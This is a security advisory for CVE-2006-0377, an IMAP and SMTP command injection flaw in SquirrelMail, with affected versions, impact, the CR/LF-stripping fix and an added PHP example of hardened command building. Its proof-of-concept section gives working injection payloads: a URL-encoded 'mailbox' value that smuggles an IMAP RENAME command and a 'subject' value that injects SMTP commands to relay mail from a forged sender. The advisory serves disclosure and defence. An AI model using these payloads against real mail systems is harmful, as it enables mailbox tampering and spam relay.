Credit:
The information has been provided by Vicente Aguilera Diaz.
Vulnerable Systems:
* IMAP Injection: All versions prior to 1.4.6
* SMTP Injection: SquirrelMail version 1.2.7
Improper validation of the commands and data that SquirrelMail transmits to the mail servers during normal use of the application (mailbox management, e-mail reading and sending, etc.) allows an authenticated malicious user to inject arbitrary IMAP/SMTP commands into the mail servers used by SquirrelMail, through parameters that the webmail front-end uses in its communication with these mail servers.
This is dangerous because injecting these commands allows an intruder to evade restrictions imposed at the application level and to exploit vulnerabilities that may exist in the mail servers through IMAP/SMTP commands.
Proof of Concept:
== IMAP example (1.4.2 version) =============
SquirrelMail Vulnerable parameter: "mailbox"
When a user clicks on the subject of an e-mail, a GET request like the following is generated:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0
A malicious user can modify the value of the "mailbox" parameter and inject any IMAP command. The IMAP command injection has the following structure:
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0A<ID>
<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>
%20SELECT%20%22INBOX&passed_id=<CODE>&startMessage=1
Example:
Injection of the RENAME IMAP command across the "mailbox" parameter:
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME
%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&
startMessage=1
== SMTP example (1.2.7 version) =============
SquirrelMail Vulnerable parameter: "subject" (and possibly others)
When a user sends a message, a POST request like the following is created:
POST http://<victim>/src/compose.php HTTP/1.1
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
-----------------------------84060780712450133071594948441
...
A malicious user can modify the value of the "subject" parameter and inject any SMTP command.
Example: Relay from a non-existent e-mail address
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept%0d%0a.%0d%0a%0d%0amail from:
hacker@domain.com%0d%0arcpt to:
victim@otherdomain.com%0d%0adata%0d%0aThis is a proof of concept of
the SMTP command injection in SquirrelMail%0d%0a.%0d%0a
-----------------------------84060780712450133071594948441
...
Impact:
IMAP/SMTP command injection allows mail relay, spam, exploitation of IMAP and SMTP vulnerabilities in the mail servers, and evasion of all restrictions at the application layer.
Solution:
Strip \r and \n from $mailbox in the function sqimap_mailbox_select. Patch available: http://www.squirrelmail.org/security/issue/2006-02-15
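The effect of stripping CR and LF, shown as an added example (not SquirrelMail's code and not the published patch). The function names and the A001 tag are hypothetical, and the escaping of the double quote and backslash goes beyond the fix described above:

```php
<?php
// Added illustration; not SquirrelMail's code. Function names are hypothetical.

// Vulnerable pattern: the request parameter is placed in the IMAP command as-is.
function build_select_unsafe(string $tag, string $mailbox): string
{
    return $tag . ' SELECT "' . $mailbox . '"' . "\r\n";
}

// Hardened pattern: remove CR and LF (the fix named in the advisory), then
// escape backslash and double quote so the value cannot close the IMAP
// quoted string (the RFC 3501 quoted-specials). The escaping is an addition
// made for this example.
function build_select_safe(string $tag, string $mailbox): string
{
    $mailbox = str_replace(["\r", "\n"], '', $mailbox);
    $mailbox = strtr($mailbox, ['\\' => '\\\\', '"' => '\\"']);
    return $tag . ' SELECT "' . $mailbox . '"' . "\r\n";
}

// Number of CRLF-terminated command lines the server would read.
function count_command_lines(string $wire): int
{
    return count(preg_split("/\r\n/", $wire, -1, PREG_SPLIT_NO_EMPTY));
}

// Constructed input: the URL-decoded "mailbox" value from the RENAME example above.
$mailbox = urldecode(
    'INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX'
);

$unsafe = build_select_unsafe('A001', $mailbox);
$safe   = build_select_safe('A001', $mailbox);

// The unsafe form reaches the server as several separate commands;
// the safe form stays a single SELECT with one quoted argument.
printf("unsafe: %d command line(s)\n", count_command_lines($unsafe));
printf("safe:   %d command line(s)\n", count_command_lines($safe));
echo $safe;
```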
CVE Information:
CVE-2006-0377